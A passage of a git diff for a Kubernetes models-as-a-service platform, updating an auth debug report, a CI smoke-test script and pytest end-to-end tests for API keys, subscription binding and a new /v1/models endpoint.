+  test_token=$(oc whoami -t 2>/dev/null || echo "")
+  if [[ -n "$test_token" ]]; then
+    _append "Test user token available: yes"
+
+    # Try to get user info from token review
+    local user_info
+    user_info=$(kubectl create --dry-run=server --raw /apis/authentication.k8s.io/v1/tokenreviews -f - <<EOF 2>/dev/null | jq -r '.status.user // empty'
+{
+  "apiVersion": "authentication.k8s.io/v1",
+  "kind": "TokenReview",
+  "spec": {
+    "token": "$test_token"
+  }
+}
+EOF
+)
+    if [[ -n "$user_info" ]]; then
+      local username groups
+      username=$(echo "$user_info" | jq -r '.username // "N/A"')
+      groups=$(echo "$user_info" | jq -r '.groups // [] | join(", ")')
+      _append "  Username: $username"
+      _append "  Groups: $groups"
+    else
+      _append "  Could not retrieve user info from token"
+    fi
+  else
+    _append "No test token available (not logged in via oc)"
+  fi
+  _append ""
+
+  _section "Subscription → Model Mapping"
+  local subscriptions_json sub_mapping
+  subscriptions_json=$(kubectl get maassubscriptions -n $MAAS_SUBSCRIPTION_NAMESPACE -o json 2>/dev/null | jq -r '.items // []' 2>/dev/null)
+  if [[ -n "$subscriptions_json" ]] && [[ "$subscriptions_json" != "[]" ]]; then
+    sub_mapping=$(echo "$subscriptions_json" | jq -r '.[] |
+      "Subscription: " + .metadata.name +
+      "\n  Owner users: " + ((.spec.owner.users // []) | join(", ") | if . == "" then "(none)" else . end) +
+      "\n  Owner groups: " + ((.spec.owner.groups // [] | map(.name)) | join(", ") | if . == "" then "(none)" else . end) +
+      "\n  Models: " + ((.spec.modelRefs // [] | map(.namespace + "/" + .name)) | join(", ") | if . == "" then "(none)" else . end)' 2>/dev/null)
+    if [[ -n "$sub_mapping" ]]; then
+      _append "$sub_mapping"
+    else
+      _append "Failed to parse subscription data"
+    fi
+  else
+    _append "No subscriptions found in $MAAS_SUBSCRIPTION_NAMESPACE"
+  fi
+  _append ""
+
+  _section "Available Models (MaaSModelRefs)"
+  local models_json model_listing
+  models_json=$(kubectl get maasmodelrefs -A -o json 2>/dev/null | jq -r '.items // []' 2>/dev/null)
+  if [[ -n "$models_json" ]] && [[ "$models_json" != "[]" ]]; then
+    _append "Model Reference → Model ID / Endpoint"
+    model_listing=$(echo "$models_json" | jq -r '.[] |
+      "  " + .metadata.namespace + "/" + .metadata.name +
+      " → " + (.spec.modelRef.name // "N/A") +
+      " (" + (.status.phase // "unknown") + ")" +
+      if .status.endpoint then "\n    Endpoint: " + .status.endpoint else "" end' 2>/dev/null)
+    if [[ -n "$model_listing" ]]; then
+      _append "$model_listing"
+    else
+      _append "Failed to parse model data"
+    fi
+  else
+    _append "No MaaSModelRefs found"
+  fi
   _append ""
 
   _section "Gateway / HTTPRoutes"
@@ -226,14 +299,66 @@ run_auth_debug_report() {
   _run "Authorino pods" "kubectl get pods -n $AUTHORINO_NAMESPACE -l 'app.kubernetes.io/name=authorino' --no-headers 2>/dev/null; kubectl get pods -n openshift-ingress -l 'app.kubernetes.io/name=authorino' --no-headers 2>/dev/null; echo '---'; kubectl get pods -A -l 'app.kubernetes.io/name=authorino' -o wide 2>/dev/null || true"
   _append ""
 
-  # Determine maas-api namespace
+  # Determine maas-api namespace from controller deployment
   local maas_api_ns
-  maas_api_ns=$(kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | .value' 2>/dev/null || echo "$DEPLOYMENT_NAMESPACE")
+  local env_json
+  env_json=$(kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null || echo "[]")
+
+  # Try to get direct .value first
+  maas_api_ns=$(echo "$env_json" | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | .value // empty' 2>/dev/null)
+
+  # If empty, check if using fieldRef (downward API)
+  if [[ -z "$maas_api_ns" ]]; then
+    local field_path
+    field_path=$(echo "$env_json" | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | .valueFrom.fieldRef.fieldPath // empty' 2>/dev/null)
+    if [[ "$field_path" == "metadata.namespace" ]]; then
+      # Using downward API - the value is the controller's namespace
+      maas_api_ns="$DEPLOYMENT_NAMESPACE"
+    fi
+  fi
+
+  # Fallback to deployment namespace if still empty
   [[ -z "$maas_api_ns" ]] && maas_api_ns="$DEPLOYMENT_NAMESPACE"
 
-  local sub_select_url="https://maas-api.${maas_api_ns}.svc.cluster.local:8443/v1/subscriptions/select"
+  local sub_select_url="https://maas-api.${maas_api_ns}.svc.cluster.local:8443/internal/v1/subscriptions/select"
   _section "Subscription Selector Endpoint Validation"
   _append "Expected URL (from maas-controller config): $sub_select_url"
+  _append "  (MAAS_API_NAMESPACE resolved to: $maas_api_ns)"
+  _append ""
+
+  # Verify actual AuthPolicy configuration
+  _append "--- Sample AuthPolicy subscription-info configuration ---"
+  local sample_policy_json
+  sample_policy_json=$(kubectl get authpolicies -A -l 'app.kubernetes.io/managed-by=maas-controller' -o json 2>/dev/null | jq -r '.items[0] // empty' 2>/dev/null)
+
+  if [[ -n "$sample_policy_json" ]]; then
+    local policy_name policy_ns
+    policy_name=$(echo "$sample_policy_json" | jq -r '.metadata.name // "unknown"')
+    policy_ns=$(echo "$sample_policy_json" | jq -r '.metadata.namespace // "unknown"')
+    _append "  Inspecting: $policy_ns/$policy_name"
+
+    local actual_url
+    actual_url=$(echo "$sample_policy_json" | jq -r '.spec.rules.metadata."subscription-info".http.url // "N/A"' 2>/dev/null)
+    _append "  Actual URL in AuthPolicy: $actual_url"
+
+    local request_body
+    request_body=$(echo "$sample_policy_json" | jq -r '.spec.rules.metadata."subscription-info".http.body.expression // "N/A"' 2>/dev/null)
+    if echo "$request_body" | grep -q "requestedModel"; then
+      _append "  ✅ Request body includes requestedModel field"
+      # Extract the model reference from the body
+      local model_ref
+      model_ref=$(echo "$request_body" | grep -o '"requestedModel"[^"]*"[^"]*"' | sed 's/.*"\([^"]*\)".*/\1/' || echo "")
+      if [[ -n "$model_ref" ]]; then
+        _append "  Model reference: $model_ref"
+      fi
+    else
+      _append "  ❌ Request body MISSING requestedModel field (should include model namespace/name)"
+    fi
+    _append "  Request body preview:"
+    _append "$(echo "$request_body" | head -5 | sed 's/^/    /')"
+  else
+    _append "  No managed AuthPolicies found"
+  fi
   _append ""
 
   local curl_ns="$AUTHORINO_NAMESPACE"
@@ -261,6 +386,24 @@ run_auth_debug_report() {
   _append "$dns_out"
   _append ""
 
+  _section "Configuration Summary"
+  _append "This summary helps compare local vs CI runs:"
+  _append ""
+  local total_models total_subs total_authpolicies total_kuadrant_authpolicies
+  total_models=$(echo "$models_json" | jq '. | length' 2>/dev/null || echo "0")
+  total_subs=$(echo "$subscriptions_json" | jq '. | length' 2>/dev/null || echo "0")
+  total_authpolicies=$(kubectl get maasauthpolicies -n $MAAS_SUBSCRIPTION_NAMESPACE -o json 2>/dev/null | jq -r '.items | length' 2>/dev/null || echo "0")
+  total_kuadrant_authpolicies=$(kubectl get authpolicies -A -l 'app.kubernetes.io/managed-by=maas-controller' -o json 2>/dev/null | jq -r '.items | length' 2>/dev/null || echo "0")
+
+  _append "  MaaSModelRefs (all namespaces): $total_models"
+  _append "  MaaSSubscriptions ($MAAS_SUBSCRIPTION_NAMESPACE): $total_subs"
+  _append "  MaaSAuthPolicies ($MAAS_SUBSCRIPTION_NAMESPACE): $total_authpolicies"
+  _append "  Generated Kuadrant AuthPolicies: $total_kuadrant_authpolicies"
+  _append ""
+  _append "  Subscription selector URL: $sub_select_url"
+  _append "  Test user: $(oc whoami 2>/dev/null || echo 'N/A')"
+  _append ""
+
   echo "$OUTPUT"
 }
 
diff --git a/test/e2e/scripts/prow_run_smoke_test.sh b/test/e2e/scripts/prow_run_smoke_test.sh
index 2999643c3..0616e3e10 100755
--- a/test/e2e/scripts/prow_run_smoke_test.sh
+++ b/test/e2e/scripts/prow_run_smoke_test.sh
@@ -11,9 +11,9 @@
 #   1. Install cert-manager and LeaderWorkerSet (LWS) operators (required for KServe)
 #   2. Deploy MaaS platform via kustomize (RHCL, gateway, MaaS API, maas-controller)
 #   3. Install OpenDataHub (ODH) operator with DataScienceCluster (KServe)
-#   4. Deploy MaaS system (free + premium + unconfigured: LLMIS + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription)
+#   4. Deploy MaaS system (free + premium + e2e test fixtures: LLMIS + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription)
 #   5. Setup test tokens (admin + regular user) for comprehensive testing
-#   6. Run E2E tests (API keys + subscription tests)
+#   6. Run E2E tests (API keys + subscription + models endpoint tests)
 #   7. Run deployment validation + token metadata verification
 # 
 # USAGE:
@@ -41,6 +41,7 @@
 #                    Affects deploy.sh (via --disable-tls-backend) and test env
 #   DEPLOYMENT_NAMESPACE - Namespace of MaaS API and controller (default: opendatahub)
 #   MAAS_SUBSCRIPTION_NAMESPACE - Namespace of MaaS CRs (default: models-as-a-service)
+#   MODEL_NAMESPACE - Namespace of models and MaaSModelRefs (default: llm)
 # =============================================================================
 
 set -euo pipefail
@@ -75,6 +76,7 @@ export OPERATOR_IMAGE=${OPERATOR_IMAGE:-}
 AUTHORINO_NAMESPACE="kuadrant-system"
 DEPLOYMENT_NAMESPACE="${DEPLOYMENT_NAMESPACE:-opendatahub}"
 MAAS_SUBSCRIPTION_NAMESPACE="${MAAS_SUBSCRIPTION_NAMESPACE:-models-as-a-service}"
+MODEL_NAMESPACE="${MODEL_NAMESPACE:-llm}"
 
 # Artifact collection: OpenShift CI provides ARTIFACT_DIR (docs.ci.openshift.org/docs/architecture/step-registry).
 # Files written here are collected to artifacts/<job>/<step>/ in Prow. Fallbacks: ARTIFACTS, LOG_DIR, or local reports.
@@ -214,15 +216,15 @@ deploy_models() {
     fi
 
     # Deploy all at once so dependencies resolve correctly
-    # Sample kustomizations hardcode namespace: models-as-a-service; override to $MAAS_SUBSCRIPTION_NAMESPACE
+    # E2E test fixtures kustomization hardcodes namespace: models-as-a-service; override to $MAAS_SUBSCRIPTION_NAMESPACE
     # so CRs land in the correct namespace.
-    if ! (cd "$PROJECT_ROOT" && kustomize build docs/samples/maas-system/ | \
+    if ! (cd "$PROJECT_ROOT" && kustomize build test/e2e/fixtures/ | \
             sed "s/namespace: models-as-a-service/namespace: $MAAS_SUBSCRIPTION_NAMESPACE/g" | \
             kubectl apply -f -); then
-        echo "❌ ERROR: Failed to deploy MaaS system"
+        echo "❌ ERROR: Failed to deploy MaaS system with e2e fixtures"
         exit 1
     fi
-    echo "✅ MaaS system deployed (free + premium tiers)"
+    echo "✅ MaaS system deployed (free + premium + e2e test fixtures)"
 
     echo "Waiting for models to be ready..."
     if ! oc wait llminferenceservice/facebook-opt-125m-simulated -n llm --for=condition=Ready --timeout=300s; then
@@ -239,53 +241,41 @@ deploy_models() {
     fi
     echo "✅ Simulator models ready"
 
-    # TODO: Currently waits for  ever and bounces controller (seems like they are not reconciled even after llmisvc are reported as up)
+    # Wait for MaaSModelRefs to transition to Ready phase.
+    # The controller now properly handles the race condition where MaaSModelRef is created
+    # before KServe creates the HTTPRoute (sets Pending, then Ready when HTTPRoute watch triggers).
     echo "Waiting for MaaSModelRefs to be Ready..."
-    local retries=0
+    local timeout=300  # 5 minutes - sufficient for KServe to create HTTPRoutes
+    local deadline=$((SECONDS + timeout))
     local all_ready=false
-    while [[ $retries -lt 30 ]]; do
+    local found_any=false
+
+    while [[ $SECONDS -lt $deadline ]]; do
         all_ready=true
+        found_any=false
         while IFS= read -r phase; do
+            found_any=true
             if [[ "$phase" != "Ready" ]]; then
                 all_ready=false
                 break
             fi
-        done < <(oc get maasmodelrefs -n llm -o jsonpath='{range .items[*]}{.status.phase}{"\n"}{end}' 2>/dev/null)
-        if $all_ready && [[ -n "$(oc get maasmodelrefs -n llm -o name 2>/dev/null)" ]]; then
+        done < <(oc get maasmodelrefs -n "$MODEL_NAMESPACE" -o jsonpath='{range .items[*]}{.status.phase}{"\n"}{end}' 2>/dev/null)
+
+        if $found_any && $all_ready; then
+            echo "✅ MaaSModelRefs ready"
             break
         fi
-        retries=$((retries + 1))
+
         sleep 5
     done
 
-    if ! $all_ready; then
-        # TODO: Remove this workaround once maas-controller reconcile logic is correct.
-        # Controller can get stuck in a bad state forever; bouncing may unstick it.
-        echo "  MaaSModelRefs not ready after ${retries} retries, bouncing maas-controller..."
-        kubectl rollout restart deployment/maas-controller -n "$DEPLOYMENT_NAMESPACE" 2>/dev/null || true
-        kubectl rollout status deployment/maas-controller -n "$DEPLOYMENT_NAMESPACE" --timeout=120s 2>/dev/null || true
-        echo "  Retrying MaaSModelRefs wait..."
-        retries=0
-        while [[ $retries -lt 30 ]]; do
-            all_ready=true
-            while IFS= read -r phase; do
-                if [[ "$phase" != "Ready" ]]; then
-                    all_ready=false
-                    break
-                fi
-            done < <(oc get maasmodelrefs -n llm -o jsonpath='{range .items[*]}{.status.phase}{"\n"}{end}' 2>/dev/null)
-            if $all_ready && [[ -n "$(oc get maasmodelrefs -n llm -o name 2>/dev/null)" ]]; then
-                break
-            fi
-            retries=$((retries + 1))
-            sleep 5
-        done
-    fi
-
-    if $all_ready; then
-        echo "✅ MaaSModelRefs ready"
-    else
-        echo "⚠️  WARNING: MaaSModelRefs still not ready after bounce, continuing anyway"
+    if ! $found_any || ! $all_ready; then
+        echo "❌ ERROR: MaaSModelRefs did not reach Ready state within ${timeout}s"
+        echo "Dumping MaaSModelRef status:"
+        oc get maasmodelrefs -n "$MODEL_NAMESPACE" -o yaml || true
+        echo "Dumping controller logs:"
+        kubectl logs deployment/maas-controller -n "$DEPLOYMENT_NAMESPACE" --tail=100 || true
+        exit 1
     fi
 
     wait_for_auth_policies_enforced
@@ -415,7 +405,7 @@ setup_premium_test_token() {
 }
 
 run_e2e_tests() {
-    echo "-- E2E Tests (API Keys + Subscription) --"
+    echo "-- E2E Tests (API Keys + Subscription + Models Endpoint) --"
 
     # Note: setup_premium_test_token() is called earlier in main execution
     # (Phase 1: Admin Setup) while still logged in as system:admin
@@ -429,7 +419,7 @@ run_e2e_tests() {
     # from its own namespace, but models are deployed in 'llm' namespace.
     # TODO: Fix maas-api to list MaaSModelRefs from ALL namespaces (pass "" to ListFromMaaSModelRefLister)
     export MODEL_NAME="facebook-opt-125m-simulated"
-    export E2E_MODEL_NAMESPACE="llm"
+    export E2E_MODEL_NAMESPACE="$MODEL_NAMESPACE"
     # TOKEN and ADMIN_OC_TOKEN are already exported by setup_test_tokens()
 
     local test_dir="$PROJECT_ROOT/test/e2e"
@@ -454,15 +444,16 @@ run_e2e_tests() {
     echo "  - ADMIN_OC_TOKEN: $(echo "${ADMIN_OC_TOKEN:-not set}" | cut -c1-20)..."
     echo "  - GATEWAY_HOST: ${GATEWAY_HOST}"
 
-    # Run all e2e tests: API keys, subscription, and namespace scoping tests
+    # Run all e2e tests: API keys, subscription, models endpoint, and namespace scoping tests
     if ! PYTHONPATH="$test_dir:${PYTHONPATH:-}" pytest \
         -v --maxfail=5 --disable-warnings \
         --junitxml="$xml" \
         --html="$html" --self-contained-html \
         --capture=tee-sys --show-capture=all --log-level=INFO \
         "$test_dir/tests/test_api_keys.py" \
-        "$test_dir/tests/test_subscription.py"; then
-        # "$test_dir/tests/test_namespace_scoping.py" \
+        "$test_dir/tests/test_namespace_scoping.py" \
+        "$test_dir/tests/test_subscription.py" \
+        "$test_dir/tests/test_models_endpoint.py" ; then 
         echo "❌ ERROR: E2E tests failed"
         exit 1
     fi
diff --git a/test/e2e/tests/conftest.py b/test/e2e/tests/conftest.py
index 5044893fd..cea745cca 100644
--- a/test/e2e/tests/conftest.py
+++ b/test/e2e/tests/conftest.py
@@ -153,11 +153,12 @@ def api_key(api_keys_base_url: str, headers: dict) -> str:
     Note: The key inherits the authenticated user's groups, which should include
     system:authenticated to satisfy AuthPolicy requirements for model access.
     """
-    print("[api_key] Creating API key for inference tests...")
+    sim_sub = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription")
+    print("[api_key] Creating API key for inference tests (subscription bound at mint)...")
     r = requests.post(
         api_keys_base_url,
         headers=headers,
-        json={"name": "e2e-test-inference-key"},
+        json={"name": "e2e-test-inference-key", "subscription": sim_sub},
         timeout=30,
         verify=TLS_VERIFY,
     )
diff --git a/test/e2e/tests/test_api_keys.py b/test/e2e/tests/test_api_keys.py
index 0b7c4d598..77aa5141c 100644
--- a/test/e2e/tests/test_api_keys.py
+++ b/test/e2e/tests/test_api_keys.py
@@ -18,6 +18,7 @@
 - ADMIN_OC_TOKEN: Admin token for admin-specific tests (optional, tests skip if not set)
 - MODEL_NAME: Override model name for inference tests (optional)
 - INFERENCE_MODEL_NAME: Model name for inference request body (optional)
+- E2E_SIMULATOR_SUBSCRIPTION: Bound on the session ``api_key`` fixture at mint (default: simulator-subscription)
 
 Admin Tests:
 Admin tests (TestAPIKeyAuthorization, admin bulk revoke) require ADMIN_OC_TOKEN.
@@ -303,17 +304,10 @@ class TestAPIKeyExpiration:
     def max_expiration_days(self) -> int:
         """Get the configured max expiration days from environment.
         
-        This value must be explicitly provided by the test harness via the
-        API_KEY_MAX_EXPIRATION_DAYS environment variable so that it matches
-        the maas-api deployment configuration. If not set or invalid, these
-        tests are skipped to avoid flaky behavior from configuration mismatch.
+        Defaults to 90 days if API_KEY_MAX_EXPIRATION_DAYS is not set,
+        matching the maas-api default (constant.DefaultAPIKeyMaxExpirationDays).
         """
-        val = os.environ.get("API_KEY_MAX_EXPIRATION_DAYS")
-        if val is None:
-            pytest.skip(
-                "API_KEY_MAX_EXPIRATION_DAYS not set; skipping expiration policy tests "
-                "to avoid mismatch with maas-api configuration"
-            )
+        val = os.environ.get("API_KEY_MAX_EXPIRATION_DAYS", "90")
         try:
             return int(val)
         except ValueError:
@@ -457,18 +451,12 @@ def test_api_key_model_access_success(
         inference_model_name: str,
     ):
         """Test 11: Valid API key can access model endpoint - verify 200 response.
-        
-        Note: Users with access to multiple subscriptions must specify which one
-        to use via X-MaaS-Subscription header.
+
+        Subscription is bound on the key at mint (see conftest ``api_key`` fixture).
         """
-        # Add subscription header - required when user matches multiple subscriptions
-        subscription_name = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription")
-        headers = api_key_headers.copy()
-        headers["X-MaaS-Subscription"] = subscription_name
-        
         r = requests.post(
             model_completions_url,
-            headers=headers,
+            headers=api_key_headers,
             json={
                 "model": inference_model_name,
                 "prompt": "Hello world",
@@ -546,10 +534,11 @@ def test_revoked_api_key_rejected(
     ):
         """Test 14: Revoked API key should be rejected with 403."""
         # Create a new key
+        designated = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription")
         r_create = requests.post(
             api_keys_base_url,
             headers=headers,
-            json={"name": "test-revoke-inference"},
+            json={"name": "test-revoke-inference", "subscription": designated},
             timeout=30,
             verify=TLS_VERIFY,
         )
@@ -630,68 +619,3 @@ def test_api_key_chat_completions(
             print(f"[inference] Chat completions returned {r.status_code}: {r.text[:200]}")
             # Don't fail - chat may not be supported
             pytest.skip(f"Chat completions returned {r.status_code}")
-
-    def test_api_key_with_explicit_subscription_header(
-        self,
-        model_completions_url: str,
-        api_key_headers: dict,
-        inference_model_name: str,
-    ):
-        """Test 16: API key with explicit x-maas-subscription header.
-        
-        When multiple subscriptions exist for the same model, the user can
-        specify which subscription to use via the x-maas-subscription header.
-        This works the same way for API keys as it does for OC tokens.
-        """
-        # Default subscription for free model
-        subscription_name = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription")
-        
-        # Add x-maas-subscription header to API key headers
-        headers_with_sub = api_key_headers.copy()
-        headers_with_sub["x-maas-subscription"] = subscription_name
-
-        r = requests.post(
-            model_completions_url,
-            headers=headers_with_sub,
-            json={
-                "model": inference_model_name,
-                "prompt": "Test subscription header",
-                "max_tokens": 5,
-            },
-            timeout=60,
-            verify=TLS_VERIFY,
-        )
-
-        assert r.status_code == 200, f"Expected 200 with explicit subscription, got {r.status_code}: {r.text}"
-        print("[inference] API key with x-maas-subscription header succeeded")
-
-    def test_api_key_with_invalid_subscription_header(
-        self,
-        model_completions_url: str,
-        api_key_headers: dict,
-        inference_model_name: str,
-    ):
-        """Test 17: API key with invalid x-maas-subscription header should fail.
-        
-        If the specified subscription doesn't exist or user isn't authorized,
-        the request should be rejected with 429 (rate limited) or 403 (forbidden).
-        """
-        # Add invalid subscription header
-        headers_with_invalid_sub = api_key_headers.copy()
-        headers_with_invalid_sub["x-maas-subscription"] = "nonexistent-subscription-xyz"
-
-        r = requests.post(
-            model_completions_url,
-            headers=headers_with_invalid_sub,
-            json={
-                "model": inference_model_name,
-                "prompt": "Test invalid subscription",
-                "max_tokens": 5,
-            },
-            timeout=30,
-            verify=TLS_VERIFY,
-        )
-
-        # Should get 429 (rate limited - no valid subscription) or 403 (forbidden)
-        assert r.status_code in (429, 403), f"Expected 429/403 for invalid subscription, got {r.status_code}: {r.text}"
-        print(f"[inference] API key with invalid subscription correctly rejected with {r.status_code}")
diff --git a/test/e2e/tests/test_models_endpoint.py b/test/e2e/tests/test_models_endpoint.py
new file mode 100644
index 000000000..2e785abfc
--- /dev/null
+++ b/test/e2e/tests/test_models_endpoint.py
@@ -0,0 +1,2104 @@
+"""
+E2E tests for the /v1/models endpoint that validate subscription-aware model filtering.
+
+Tests the /v1/models endpoint in maas-api/internal/handlers/models.go which lists
+available models filtered by the user's subscription access.
+
+Requires same environment setup as test_subscription.py:
+  - GATEWAY_HOST env var (e.g. maas.apps.cluster.example.com)
+  - MAAS_API_BASE_URL env var (e.g. https://maas.apps.cluster.example.com/maas-api)
+  - maas-controller deployed with example CRs applied
+  - oc/kubectl access to create service account tokens
+"""
+
+import json
+import logging
+import os
+import subprocess
+import time
+
+import pytest
+import requests
+
+# Import helpers from test_subscription module
+from test_subscription import (
+    _apply_cr,
+    _create_api_key,
+    _create_sa_token,
+    _create_test_auth_policy,
+    _create_test_subscription,
+    _delete_cr,
+    _delete_sa,
+    _get_auth_policies_for_model,
+    _get_cr,
+    _get_subscriptions_for_model,
+    _maas_api_url,
+    _ns,
+    _sa_to_user,
+    _snapshot_cr,
+    _wait_reconcile,
+    DISTINCT_MODEL_ID,
+    DISTINCT_MODEL_REF,
+    DISTINCT_MODEL_2_ID,
+    DISTINCT_MODEL_2_REF,
+    MODEL_NAMESPACE,
+    MODEL_REF,
+    PREMIUM_MODEL_REF,
+    UNCONFIGURED_MODEL_REF,
+    SIMULATOR_ACCESS_POLICY,
+    SIMULATOR_SUBSCRIPTION,
+    TIMEOUT,
+    TLS_VERIFY,
+)
+
+log = logging.getLogger(__name__)
+
+
+class TestModelsEndpoint:
+    """
+    End-to-end tests for the /v1/models endpoint that validate subscription-aware
+    model filtering behavior.
+
+    The /v1/models endpoint (maas-api/internal/handlers/models.go) lists available
+    models filtered by authentication method and subscription access. Key behaviors:
+    - API keys: Returns models from the subscription bound to the key at mint time (ignores header)
+    - K8s tokens (no header): Returns models from all accessible subscriptions
+    - K8s tokens (with X-MaaS-Subscription): Filters to specified subscription
+    - Returns HTTP 403 with permission_error for subscription authorization failures
+    - Returns HTTP 401 for missing authentication
+    - Filters models based on subscription access (probes each model endpoint)
+
+    Test Coverage (22 tests) - Organized by Expected HTTP Status:
+
+    ═══════════════════════════════════════════════════════════════════════════
+    SUCCESS CASES (HTTP 200) - Authentication Method Behaviors
+    ═══════════════════════════════════════════════════════════════════════════
+    1. test_api_key_scoped_to_subscription
+       → API key returns models from bound subscription only
+
+    2. test_api_key_ignores_subscription_header
+       → API key ignores x-maas-subscription header and uses bound subscription
+
+    3. test_multiple_api_keys_different_subscriptions
+       → Multiple API keys each bound to different subscriptions work independently
+
+    4. test_user_token_returns_all_models
+       → K8s token (no header) returns models from all subscriptions
+
+    5. test_user_token_with_subscription_header_filters
+       → K8s token with X-MaaS-Subscription filters to that subscription
+
+    6. test_service_account_token_multiple_subs_no_header
+       → K8s token with access to multiple subscriptions returns all (no header)
+
+    7. test_service_account_token_multiple_subs_with_header
+       → K8s token with multiple subscriptions filters by header
+
+    ═══════════════════════════════════════════════════════════════════════════
+    SUCCESS CASES (HTTP 200) - Legacy Behaviors (backwards compatibility)
+    ═══════════════════════════════════════════════════════════════════════════
+    8. test_single_subscription_auto_select
+       → User with one subscription, no header → 200 (returns that subscription's models)
+
+    9. test_explicit_subscription_header
+       → K8s token with explicit X-MaaS-Subscription header → 200 (filters to that subscription)
+
+    10. test_empty_subscription_header_value
+        → Empty header value → 200 (same as no header - returns all models)
+
+    ═══════════════════════════════════════════════════════════════════════════
+    SUCCESS CASES (HTTP 200) - Model Filtering & Data Validation
+    ═══════════════════════════════════════════════════════════════════════════
+    11. test_models_filtered_by_subscription
+        → Models correctly filtered by specified subscription
+
+    12. test_deduplication_same_model_multiple_refs
+        → Same modelRef listed twice deduplicates to 1 entry (same URL)
+
+    13. test_different_modelrefs_same_model_id
+        → Different modelRefs (different URLs) return 2 separate entries
+
+    14. test_multiple_distinct_models_in_subscription
+        → Different modelRefs with different IDs returns 2 entries (no duplicates)
+
+    15. test_empty_model_list
+        → Empty model list should return [] not null
+
+    16. test_response_schema_matches_openapi
+        → Response structure matches OpenAPI specification
+
+    17. test_model_metadata_preserved
+        → Model fields (url, ready, created, owned_by) accurate
+
+    ═══════════════════════════════════════════════════════════════════════════
+    ERROR CASES (HTTP 403) - Permission Errors
+    ═══════════════════════════════════════════════════════════════════════════
+    18. test_api_key_with_deleted_subscription_403
+        → API key bound to deleted subscription → 403 permission_error
+
+    19. test_api_key_with_inaccessible_subscription_403
+        → API key/user with subscription they don't have access to → 403 permission_error
+
+    20. test_invalid_subscription_header_403
+        → K8s token with non-existent subscription → 403 permission_error
+
+    21. test_access_denied_to_subscription_403
+        → K8s token with subscription they lack access to → 403 permission_error
+
+    ═══════════════════════════════════════════════════════════════════════════
+    ERROR CASES (HTTP 401) - Authentication Errors
+    ═══════════════════════════════════════════════════════════════════════════
+    18. test_unauthenticated_request_401
+        → No Authorization header → 401 authentication_error
+    """
+
+    @classmethod
+    def setup_class(cls):
+        """Validate test environment prerequisites before running any tests."""
+        log.info("=" * 60)
+        log.info("Validating /v1/models E2E Test Prerequisites")
+        log.info("=" * 60)
+
+        # Validate MODEL_REF exists and is Ready
+        model = _get_cr("maasmodelref", MODEL_REF, MODEL_NAMESPACE)
+        if not model:
+            pytest.fail(f"PREREQUISITE MISSING: MaaSModelRef '{MODEL_REF}' not found in namespace '{MODEL_NAMESPACE}'. "
+                       f"Ensure prow setup has created the model.")
+
+        phase = model.get("status", {}).get("phase")
+        endpoint = model.get("status", {}).get("endpoint")
+        if phase != "Ready" or not endpoint:
+            pytest.fail(f"PREREQUISITE INVALID: MaaSModelRef '{MODEL_REF}' not Ready "
+                       f"(phase={phase}, endpoint={endpoint or 'none'}). "
+                       f"Wait for reconciliation or check controller logs.")
+
+        log.info(f"✓ Model '{MODEL_REF}' is Ready")
+        log.info(f"  Endpoint: {endpoint}")
+
+        # Discover existing auth policies and subscriptions (for debugging)
+        cls.discovered_auth_policies = _get_auth_policies_for_model(MODEL_REF)
+        cls.discovered_subscriptions = _get_subscriptions_for_model(MODEL_REF)
+
+        log.info(f"✓ Found {len(cls.discovered_auth_policies)} auth policies for model:")
+        for policy in cls.discovered_auth_policies:
+            log.info(f"  - {policy}")
+
+        log.info(f"✓ Found {len(cls.discovered_subscriptions)} subscriptions for model:")
+        for sub in cls.discovered_subscriptions:
+            log.info(f"  - {sub}")
+
+        # Validate expected resources exist
+        if SIMULATOR_ACCESS_POLICY not in cls.discovered_auth_policies:
+            pytest.fail(f"PREREQUISITE MISSING: Expected auth policy '{SIMULATOR_ACCESS_POLICY}' not found. "
+                       f"Found: {cls.discovered_auth_policies}. "
+                       f"Ensure prow setup has created the auth policy.")
+
+        if SIMULATOR_SUBSCRIPTION not in cls.discovered_subscriptions:
+            pytest.fail(f"PREREQUISITE MISSING: Expected subscription '{SIMULATOR_SUBSCRIPTION}' not found. "
+                       f"Found: {cls.discovered_subscriptions}. "
+                       f"Ensure prow setup has created the subscription.")
+
+        log.info("=" * 60)
+        log.info("✅ All prerequisites validated - proceeding with /v1/models tests")
+        log.info("=" * 60)
+
+    def test_single_subscription_auto_select(self):
+        """
+        Test: User with exactly one accessible subscription can list models without
+        providing x-maas-subscription header (auto-selection).
+
+        Expected: HTTP 200 with models from that subscription.
+
+        Note: Temporarily deletes simulator-subscription to ensure test user has exactly
+        ONE subscription (not two, which would require a header).
+        """
+        sa_name = "e2e-models-single-sub-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        auth_policy_name = "e2e-single-sub-auth"
+        subscription_name = "e2e-single-sub-subscription"
+
+        # Snapshot existing subscription to restore later
+        original_sim = _snapshot_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
+
+        api_key = None
+        try:
+            # Create service account
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Delete simulator-subscription so user has exactly ONE subscription
+            # (otherwise they'd have 2: ours + simulator-subscription via system:authenticated)
+            _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
+
+            # Create auth policy and subscription for test user using DISTINCT_MODEL_REF
+            # (avoids conflicts with existing simulator-access auth policy)
+            log.info(f"Creating auth policy and subscription for {sa_user} with {DISTINCT_MODEL_REF}")
+            _create_test_auth_policy(auth_policy_name, DISTINCT_MODEL_REF, users=[sa_user])
+            _create_test_subscription(subscription_name, DISTINCT_MODEL_REF, users=[sa_user])
+
+            # Create API key for inference
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key")
+
+            # Wait for Authorino to sync auth policies (can take 30+ seconds)
